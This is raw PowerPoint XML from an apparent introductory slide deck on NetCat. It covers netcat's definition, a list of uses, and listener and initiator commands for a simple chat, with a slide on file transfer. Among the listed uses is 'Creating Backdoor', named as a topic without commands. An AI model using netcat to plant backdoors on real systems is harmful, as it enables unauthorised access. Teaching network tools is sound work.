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E81ABD-7DAA-4A39-B99A-57A2D6F23C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0574C4-5F4B-4723-A14C-DA3B7CE776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6889F1-60DD-43FE-A6E9-861441D9D21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2FF149-F375-4BB6-A6E9-C7C62E814A8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6B2432-030F-4CB9-B02A-5BD25E443B9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6202B1-535A-4202-8997-0F506A629A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515387-8A57-43BA-9E1C-D0A70D3B80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9FBACB-90D2-4858-BF72-DED83F06C96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B61727-72F8-4E33-B25D-BA48750DC7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8840" cy="55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4E736E-637F-465C-A668-1D2CE8447D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84F7AE-9A87-4F08-A994-D99C7D52B5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626D14-E3B3-4178-9934-941A5E3F84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DFDE5A-E9E5-45B7-B0B0-77C50028C5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CE21BF-9320-4F51-8DE6-49A6CD1E9A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44F7BF-4434-4CB2-804D-AC0BF5B37D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696434-7B1B-4445-9A88-373A33828D9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296828-19CD-46F6-8D55-8AB51BF5154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44F08F-B6BC-4F6A-84EA-5311C1A27E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ACA1708-BAC3-4B84-AA13-63306B8C21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F9A80EC-814A-404D-A882-B73F360167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3CD24D4-08F9-43FC-A9CF-AEC9871E6C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DB13DA4-98CC-428E-BA4E-46A27405774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F90D67-8796-4E46-91E0-AF4406152E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8840" cy="55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0F450A-5C5E-4399-8C08-0FFF7E8283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326331B-6F3B-43A5-91E4-C815A3489F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7E8547F-BE4A-44FB-AFB8-6FC4B57E97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AB2A7F2-F30F-4F88-A2E9-1728011ED1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A40863D-B191-422B-9010-EFFDBD915E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A56D66E-E2CD-4DA1-9DCD-2C96B4DB5B4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9161F7A-40BD-4942-888D-74159AD3A5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FD18E33-F17A-4B8E-9142-9640AC38054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C44EAF0-7865-413E-BC39-0161FB9379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94F2774-1F48-4F43-BDF1-7FD24DC140D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CD15DD-82A2-4580-A731-11E1D18D14F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B996B0-CA31-4124-84BB-BCA84189112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672C7ED-DEEB-4C85-BF26-16280754DCC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8840" cy="55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7F7FCAD-819C-4F26-B987-66196B9F98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57087AD-8751-4BA9-9566-062996E5186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871357B-BE32-4DDA-BDDC-5FB33E53A2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11E2A64-A699-4EB2-8CFC-66E8A603E82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F7CC188-88B1-4F64-B9C5-A24B7BA10D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ACA8F7E-B106-4870-A5E4-37F35AA7903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EDDCB8D-3F7E-4D92-B525-B7AE4777FEA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6367EF-3BFB-4694-B454-CCE9F9E1DF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8840" cy="55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03BAC5-5357-450C-BB5B-0611A8FCF2B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297CA3-BCB4-46CA-A192-9D09EDBD501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B4FAD6-256E-4FAB-B84C-6CDDB5A019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00CB33-120D-4BE0-9CE1-63085DB6BA1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15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200" cy="79920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill rotWithShape="0">
            <a:blip r:embed="rId1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200" cy="79920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill rotWithShape="0">
            <a:blip r:embed="rId1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200" cy="2742480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill rotWithShape="0">
            <a:blip r:embed="rId1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360" cy="1080360"/>
            <a:chOff x="9649080" y="4069080"/>
            <a:chExt cx="1080360" cy="108036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360" cy="108036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00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3040" cy="63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2800" b="1" strike="noStrike" spc="-1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B7AF812-B3FF-4645-9CD1-B9708B6EC045}" type="slidenum">
              <a:rPr lang="en-IN" sz="2800" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Rockwell Condensed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ftr" idx="4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sldNum" idx="5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tIns="45000" rIns="1836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8DF2E0F6-BDA5-4A62-A245-73ED7A1A2241}" type="slidenum">
              <a:rPr lang="en-IN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6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ftr" idx="7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tIns="45000" rIns="1836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6CCDAB7-2686-4A1D-9A9F-ADD6D003FFC3}" type="slidenum">
              <a:rPr lang="en-IN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ftr" idx="10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sldNum" idx="11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tIns="45000" rIns="1836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5D9C33D-038A-4CBC-A625-13B696B34287}" type="slidenum">
              <a:rPr lang="en-IN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12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240" cy="303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IN" sz="9600" b="0" strike="noStrike" cap="all" spc="-1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Rockwell Condensed"/>
              </a:rPr>
              <a:t>NetCat</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="96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712760" y="3326400"/>
            <a:ext cx="2765520" cy="40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IN" sz="2200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
              </a:rPr>
              <a:t>Swiss Army Knife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04200" y="212040"/>
            <a:ext cx="9782640" cy="118404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rmAutofit fontScale="99000"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6000" b="0" strike="noStrike" cap="all" spc="197">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
              </a:rPr>
              <a:t>What is NetCat ?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78280" y="1854000"/>
            <a:ext cx="9883080" cy="297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500"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Gill Sans MT"/>
              </a:rPr>
              <a:t>NetCat is a computer networking utility for reading from and writing to network connections using TCP or UDP.  The command is designed to be a dependable back-end that can be used directly or easily driven by other programs and scripts.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31280" y="52344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cap="all" spc="197">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:latin typeface="arial"/>
              </a:rPr>
              <a:t>Basic use of netcat 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828800" y="1984320"/>
            <a:ext cx="9310680" cy="341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000" lnSpcReduction="10000"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02124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3200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:latin typeface="arial"/>
              </a:rPr>
              <a:t>Network Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN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02124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3200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:latin typeface="arial"/>
              </a:rPr>
              <a:t>Banner Grabbing </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN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02124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3200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:latin typeface="arial"/>
              </a:rPr>
              <a:t>Network Chatting</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN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02124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3200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:latin typeface="arial"/>
              </a:rPr>
              <a:t>Sharing Files</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN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02124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3200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:latin typeface="arial"/>
              </a:rPr>
              <a:t>Executing Binary Files</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN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02124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3200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:latin typeface="arial"/>
              </a:rPr>
              <a:t>Creating Backdoor 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229120" y="113400"/>
            <a:ext cx="7728840" cy="885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90000"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0" strike="noStrike" cap="all" spc="197">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
              </a:rPr>
              <a:t>How to use netcat for chatting  ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="180" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="305280" y="4310280"/>
            <a:ext cx="3846240" cy="2112840"/>
            <a:chOff x="305280" y="4310280"/>
            <a:chExt cx="3846240" cy="2112840"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="181" name="Freeform: Shape 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="327240" y="6292800"/>
              <a:ext cx="3802680" cy="130320"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 3802680"/>
                <a:gd name="textAreaRight" fmla="*/ 3803400 w 380268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Freeform: Shape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="720720" y="4310280"/>
              <a:ext cx="3015720" cy="1966320"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 3015720"/>
                <a:gd name="textAreaRight" fmla="*/ 3016440 w 3015720"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 1966320"/>
                <a:gd name="textAreaBottom" fmla="*/ 1967040 h 1966320"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="849600" y="4430520"/>
              <a:ext cx="2753280" cy="1682280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 2753280"/>
                <a:gd name="textAreaRight" fmla="*/ 2754000 w 2753280"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 1682280"/>
                <a:gd name="textAreaBottom" fmla="*/ 1683000 h 1682280"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="305280" y="6201000"/>
              <a:ext cx="3846240" cy="152280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 3846240"/>
                <a:gd name="textAreaRight" fmla="*/ 3846960 w 3846240"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 152280"/>
                <a:gd name="textAreaBottom" fmla="*/ 153000 h 152280"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1963440" y="6217920"/>
              <a:ext cx="537480" cy="60480"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 537480"/>
                <a:gd name="textAreaRight" fmla="*/ 538200 w 537480"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 60480"/>
                <a:gd name="textAreaBottom" fmla="*/ 61200 h 60480"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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6" name="Group 8"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="488520" y="6273720"/>
              <a:ext cx="136800" cy="37440"/>
              <a:chOff x="488520" y="6273720"/>
              <a:chExt cx="136800" cy="37440"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="187" name="Rectangle: Rounded Corners 13"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="488520" y="6273720"/>
                <a:ext cx="136800" cy="3744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Rectangle: Rounded Corners 14"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="519480" y="6283080"/>
                <a:ext cx="74880" cy="1764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9" name="Group 9"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3764520" y="6273360"/>
              <a:ext cx="293760" cy="37440"/>
              <a:chOff x="3764520" y="6273360"/>
              <a:chExt cx="293760" cy="37440"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="190" name="Rectangle: Rounded Corners 11"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3764520" y="6273360"/>
                <a:ext cx="293760" cy="3744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Rectangle: Rounded Corners 12"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3820680" y="6282720"/>
                <a:ext cx="181800" cy="1764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2" name="Freeform: Shape 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1782000" y="4316760"/>
              <a:ext cx="1820880" cy="1805040"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1820880"/>
                <a:gd name="textAreaRight" fmla="*/ 1821600 w 1820880"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 1805040"/>
                <a:gd name="textAreaBottom" fmla="*/ 1805760 h 1805040"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8371080" y="4310280"/>
            <a:ext cx="3846240" cy="2112840"/>
            <a:chOff x="8371080" y="4310280"/>
            <a:chExt cx="3846240" cy="2112840"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="194" name="Freeform: Shape 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8392680" y="6292800"/>
              <a:ext cx="3802680" cy="130320"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 3802680"/>
                <a:gd name="textAreaRight" fmla="*/ 3803400 w 3802680"/>
                <a:gd name="textAreaTop" fmla="*/ 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Freeform: Shape 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8786160" y="4310280"/>
              <a:ext cx="3015720" cy="1966320"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 3015720"/>
                <a:gd name="textAreaRight" fmla="*/ 3016440 w 3015720"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 1966320"/>
                <a:gd name="textAreaBottom" fmla="*/ 1967040 h 1966320"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8915040" y="4430520"/>
              <a:ext cx="2753280" cy="1682280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 2753280"/>
                <a:gd name="textAreaRight" fmla="*/ 2754000 w 2753280"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 1682280"/>
                <a:gd name="textAreaBottom" fmla="*/ 1683000 h 1682280"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8371080" y="6201000"/>
              <a:ext cx="3846240" cy="152280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 3846240"/>
                <a:gd name="textAreaRight" fmla="*/ 3846960 w 3846240"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 152280"/>
                <a:gd name="textAreaBottom" fmla="*/ 153000 h 152280"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10029240" y="6217920"/>
              <a:ext cx="537480" cy="60480"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 537480"/>
                <a:gd name="textAreaRight" fmla="*/ 538200 w 537480"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 60480"/>
                <a:gd name="textAreaBottom" fmla="*/ 61200 h 60480"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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9" name="Group 21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8553960" y="6273720"/>
              <a:ext cx="136800" cy="37440"/>
              <a:chOff x="8553960" y="6273720"/>
              <a:chExt cx="136800" cy="37440"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="200" name="Rectangle: Rounded Corners 26"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8553960" y="6273720"/>
                <a:ext cx="136800" cy="3744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Rectangle: Rounded Corners 27"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8584920" y="6283080"/>
                <a:ext cx="74880" cy="1764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2" name="Group 22"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="11829960" y="6273360"/>
              <a:ext cx="293760" cy="37440"/>
              <a:chOff x="11829960" y="6273360"/>
              <a:chExt cx="293760" cy="37440"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="203" name="Rectangle: Rounded Corners 24"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="11829960" y="6273360"/>
                <a:ext cx="293760" cy="3744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" name="Rectangle: Rounded Corners 25"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="11886120" y="6282720"/>
                <a:ext cx="181800" cy="1764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5" name="Freeform: Shape 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9847440" y="4316760"/>
              <a:ext cx="1820880" cy="1805040"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1820880"/>
                <a:gd name="textAreaRight" fmla="*/ 1821600 w 1820880"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 1805040"/>
                <a:gd name="textAreaBottom" fmla="*/ 1805760 h 1805040"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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TextBox 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2229120" y="990000"/>
            <a:ext cx="772884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73239"/>
                </a:solidFill>
                <a:latin typeface="urw-din"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Netcat can also be used to chat between two users. We need to establish a connection before chatting. To do this we are going to need two devices. One will play the role of initiator and one will be a listener to start the conversation and so once the connection is established, communication can be done from both ends.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7" name="TextBox 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1672560" y="3830760"/>
            <a:ext cx="138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urw-din"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Initiator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8" name="TextBox 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9549720" y="3858480"/>
            <a:ext cx="1429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urw-din"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Listener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9" name="TextBox 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="869760" y="4429080"/>
            <a:ext cx="2734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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN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IN" sz="14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nc &lt;Listener IP&gt;  &lt;Port&gt;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10" name="TextBox 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8915040" y="4429080"/>
            <a:ext cx="2734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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN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nc –lvp &lt;Port&gt;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1" name="TextBox 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080000" y="4794480"/>
            <a:ext cx="18093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Hi, How are you?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12" name="TextBox 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9111600" y="4754880"/>
            <a:ext cx="18093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Hi, How are you?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13" name="Arrow: Right 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3764520" y="4908600"/>
            <a:ext cx="5016600" cy="57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B5771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chemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Text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142560"/>
            <a:ext cx="10514880" cy="885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0" strike="noStrike" cap="all" spc="197">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
              </a:rPr>
              <a:t>Sending and Receiving Data or file ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="215" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1702440" y="2650320"/>
            <a:ext cx="1663200" cy="945360"/>
            <a:chOff x="1702440" y="2650320"/>
            <a:chExt cx="1663200" cy="945360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="216" name="Freeform: Shape 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1712160" y="3537720"/>
              <a:ext cx="1644120" cy="57960"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1644120"/>
                <a:gd name="textAreaRight" fmla="*/ 1644840 w 1644120"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 57960"/>
                <a:gd name="textAreaBottom" fmla="*/ 58680 h 57960"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1882080" y="2650320"/>
              <a:ext cx="1303920" cy="879840"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1303920"/>
                <a:gd name="textAreaRight" fmla="*/ 1304640 w 1303920"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 879840"/>
                <a:gd name="textAreaBottom" fmla="*/ 880560 h 879840"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1937880" y="2703960"/>
              <a:ext cx="1190520" cy="752760"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1190520"/>
                <a:gd name="textAreaRight" fmla="*/ 1191240 w 1190520"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 752760"/>
                <a:gd name="textAreaBottom" fmla="*/ 753480 h 752760"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1702440" y="3496680"/>
              <a:ext cx="1663200" cy="67680"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1663200"/>
                <a:gd name="textAreaRight" fmla="*/ 1663920 w 1663200"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 67680"/>
                <a:gd name="textAreaBottom" fmla="*/ 68400 h 67680"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2419560" y="3504240"/>
              <a:ext cx="231840" cy="26640"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 231840"/>
                <a:gd name="textAreaRight" fmla="*/ 232560 w 231840"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 26640"/>
                <a:gd name="textAreaBottom" fmla="*/ 27360 h 26640"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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1" name="Group 8"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1781640" y="3529080"/>
              <a:ext cx="58680" cy="16560"/>
              <a:chOff x="1781640" y="3529080"/>
              <a:chExt cx="58680" cy="16560"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="222" name="Rectangle: Rounded Corners 13"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1781640" y="3529080"/>
                <a:ext cx="5868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Rectangle: Rounded Corners 14"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1795320" y="3533400"/>
                <a:ext cx="3204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4" name="Group 9"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3198600" y="3528720"/>
              <a:ext cx="126720" cy="16560"/>
              <a:chOff x="3198600" y="3528720"/>
              <a:chExt cx="126720" cy="16560"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="225" name="Rectangle: Rounded Corners 11"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3198600" y="3528720"/>
                <a:ext cx="12672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Rectangle: Rounded Corners 12"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3222720" y="3533040"/>
                <a:ext cx="7812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7" name="Freeform: Shape 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2341080" y="2653200"/>
              <a:ext cx="786960" cy="807480"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 786960"/>
                <a:gd name="textAreaRight" fmla="*/ 787680 w 786960"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 807480"/>
